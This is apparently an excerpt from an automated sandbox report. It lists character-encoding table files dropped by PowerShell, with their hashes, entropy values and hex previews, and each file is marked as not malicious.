                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1111
                                                                                                                                                                                                                      Entropy (8bit):3.531149521168141
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:KcJ5mHVBUlJvRj7SOVbusZhAMiZyi77qpSzIa9qVRS3YcEchJh3MAxSl:KmmMlBVnrAMiwMmAzIxVgBE6cAxQ
                                                                                                                                                                                                                      MD5:96F54CC639ACA8E466FB8058144C9350
                                                                                                                                                                                                                      SHA1:0B9530D6080F2BAACABD5AA0D48BFF316FCCEF64
                                                                                                                                                                                                                      SHA-256:0E43244BFC4F33FACB844B9E00270A1A4C24DC59B8A9B95104E2D788BB2F59FD
                                                                                                                                                                                                                      SHA-512:5B7859325E5E34C9D4558B1198795BB9C6A8EF783EB97193EA80BA76C38AFE9BDD1B526B77401DF5456B7A0E85E942191FFD4B4F2B9F0C8168A7093EE452802E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: koi8-r, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204512553255425552556255725582559255A255B255C255D255E..255F25602561040125622563256425652566256725682569256A256B256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1111
                                                                                                                                                                                                                      Entropy (8bit):3.5076564572101714
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:K+HVBUlJvRj7SOVbusZhAMiZyi77qpSzIaU3dmVRS3YcEchJh3MAxSl:K+MlBVnrAMiwMmAzI/EVgBE6cAxQ
                                                                                                                                                                                                                      MD5:4B755EF2288DFC4009759F8935479D68
                                                                                                                                                                                                                      SHA1:C3BDF0D9DF316DE8919DAA4329275C5AA81D61B4
                                                                                                                                                                                                                      SHA-256:ED04D5B977B8C8944D8760B713FF061292DA5634BCBB67CDFB1C3A6FF5378C81
                                                                                                                                                                                                                      SHA-512:3F1E1CC47327054FB9C54157ED10514230F10BFCD4BD9FDAFA02D7B238137DC7442CA2661B0739D8EEA3181E187D3B639A2C8118A0DE272C96000908121B6CFB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: koi8-u, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204510454255404560457255725582559255A255B0491255D255E..255F25602561040104032563040604072566256725682569256A0490256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):94393
                                                                                                                                                                                                                      Entropy (8bit):2.4104200953565513
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:XbjO7Uw6uKdosXRxps9a+ut/BmZPwkpT9A0T03o:XfO4ZBRxpV+4wPwKloo
                                                                                                                                                                                                                      MD5:366C09E4A4CC10006E593F5B3F3461D7
                                                                                                                                                                                                                      SHA1:A0DABFBEEB66E26FB342844EA41772D7A1D19C24
                                                                                                                                                                                                                      SHA-256:9B27FE7E7054F36E279993F19E52E18AC03360D117AE80C42B4E984A97C590AA
                                                                                                                                                                                                                      SHA-512:670F32D698C7992038E736D3AD40098D8589C0C5A1379E32A0F02A02FAF251B1312CAD131DDADC3F80B23A3821A91689F2E310309028BDDDF227D532EB505A20
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: ksc5601, double-byte..D..233F 0 89..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300200B72025202600A8300300AD20152225FF3C223C20182019..201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7..00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640..222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6..25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D..221D2235222B222C2208220B2286228722822283222A222922272228FFE20000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1116
                                                                                                                                                                                                                      Entropy (8bit):3.4295694929963667
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8jHVBUlJvRj7SOVbusZhAMiZyi77qHVPJSf2FcVDu1LEe4qPPMl2J89:8jMlBVnrAMiwMmHEmJ4IMgi9
                                                                                                                                                                                                                      MD5:10850BCFB943318284D6191494EBD7D5
                                                                                                                                                                                                                      SHA1:237D5DDF7969A422991F17021244D13A2BB0DE92
                                                                                                                                                                                                                      SHA-256:81ECA6840B87F2DEF9FCDD171A55C2D71A49386D88401CE927AE57D7DDD7AAAA
                                                                                                                                                                                                                      SHA-512:D797781C228B70D2D83DB8ABA08F840CE49846C9473CC89A2E316900D9E08A63142E68AD9ABBB2EF67BF9F1D392772FAB36CCC09632022A1437AE27C11F2284F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macCentEuro, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179..017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC..202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E..012F012A22642265012B0136220222110142013B013C013D013E0139013A0145..0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C..20132014201C201D2018201900F725CA014D0154015501582039203A01590156..01570160201A201E
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1116
                                                                                                                                                                                                                      Entropy (8bit):3.3992482002374516
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8ULyHVBUlJvRj7SOVbusZhAMiZyi77qsTMdKxOZwwL+KR5D/jlJy6QWky:8ULyMlBVnrAMiwMmOsL+KR5DblE85
                                                                                                                                                                                                                      MD5:A60FBDE33D13C732095713D1AB6713AB
                                                                                                                                                                                                                      SHA1:4B0EB443F2D0E4B8DB7D0435F9311E5F9A625123
                                                                                                                                                                                                                      SHA-256:BBE6F5EBB5EAB08C91DF7D524FAF39B03AA8B9F84C67ABA0553A84EC56668CB9
                                                                                                                                                                                                                      SHA-512:3EEBA6BA3FCD875AFBD5DF41EDC21E872416A48D03343232904CC99CAF913045DAF7B1A1ACD0949EF794AD7B6C9AE8F93808423FFC4B67718E732B2FF5D9B6D7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macCroatian, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8..221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8..00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153..01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB..201300B7201A201E
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1116
                                                                                                                                                                                                                      Entropy (8bit):3.4178221849964903
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8dHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJY:8dMlBVnrAMiwMm8Y6zUk+UVsJY
                                                                                                                                                                                                                      MD5:C390D66441AC61CCF0A685CA5EE0BC1C
                                                                                                                                                                                                                      SHA1:FCAE825B54400B9D736EF22A613E359E3F0FA6C2
                                                                                                                                                                                                                      SHA-256:76EFE571ADDA7AED467F146CB0BD3A2351F2A720508EA0642C419F5347789CAA
                                                                                                                                                                                                                      SHA-512:C891DB15E0F600965885DE6745EDD2A4E3A6A20CA30A9AAE89CBD8C429F8455C4AF7F2FC053FB3D730D8544AB6A6E78E769DB93DAD7B29868B746FA10373F021
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macCyrillic, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..0430043104320433
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1116
                                                                                                                                                                                                                      Entropy (8bit):3.870022681111701
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:87JMHkUlJvRjmf9RCsUBOdXsCbbNviANpkDP1XFAoE4xSF5HrBPkdn:87KvlA9RCs6CXrViANUP1XFA9eSvdPKn
                                                                                                                                                                                                                      MD5:DCE78527E3A7B7CB1DE9EE5FAF12AFC6
                                                                                                                                                                                                                      SHA1:20F4A3F4DB6B3422C04EBB6B21A568E4C173F9C1
                                                                                                                                                                                                                      SHA-256:062E31D48DC33160999074E49205E08C3655DFF91C2C87F254522E6EBCE2DD96
                                                                                                                                                                                                                      SHA-512:627F5FD2F12B341F2D7EE9032946FE057C4AC74D99687178CEA98B3E150307BB6AA2495B0FA46400760D467E2BF589BE31E998E25CE1D1E8465DA61F22047345
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macDingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A3
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1113
                                                                                                                                                                                                                      Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                      MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                      SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                      SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                      SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                      MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                      SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                      SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                      SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48813
                                                                                                                                                                                                                      Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                      MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                      SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                      SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                      SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1113
                                                                                                                                                                                                                      Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                      MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                      SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                      SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                      SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                      MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                      SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                      SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                      SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1112
                                                                                                                                                                                                                      Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                      MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                      SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                      SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                      SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                      MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                      SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                      SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                      SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1115
                                                                                                                                                                                                                      Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                      MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                      SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                      SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
